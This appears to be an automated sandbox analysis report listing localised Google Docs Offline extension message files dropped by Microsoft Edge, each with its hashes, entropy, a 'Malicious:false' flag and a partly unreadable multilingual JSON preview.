                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2230
                                                                                                                                                                                                                                                        Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                        MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                        SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                        SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                        SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1160
                                                                                                                                                                                                                                                        Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                        MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                        SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                        SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                        SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):3264
                                                                                                                                                                                                                                                        Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                        MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                        SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                        SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                        SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):3235
                                                                                                                                                                                                                                                        Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                        MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                        SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                        SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                        SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):3122
                                                                                                                                                                                                                                                        Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                        MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                        SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                        SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                        SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1895
                                                                                                                                                                                                                                                        Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                        MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                        SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                        SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                        SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1042
                                                                                                                                                                                                                                                        Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                        MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                        SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                        SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                        SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2535
                                                                                                                                                                                                                                                        Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                        MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                        SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                        SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                        SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1028
                                                                                                                                                                                                                                                        Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                        MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                        SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                        SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                        SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):994
                                                                                                                                                                                                                                                        Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                        MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                        SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                        SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                        SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2091
                                                                                                                                                                                                                                                        Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                        MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                        SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                        SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                        SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2778
                                                                                                                                                                                                                                                        Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                        MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                        SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                        SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                        SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1719
                                                                                                                                                                                                                                                        Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                        MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                        SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                        SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                        SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):936
                                                                                                                                                                                                                                                        Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                        MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                        SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                        SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                        SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                        Malicious:false
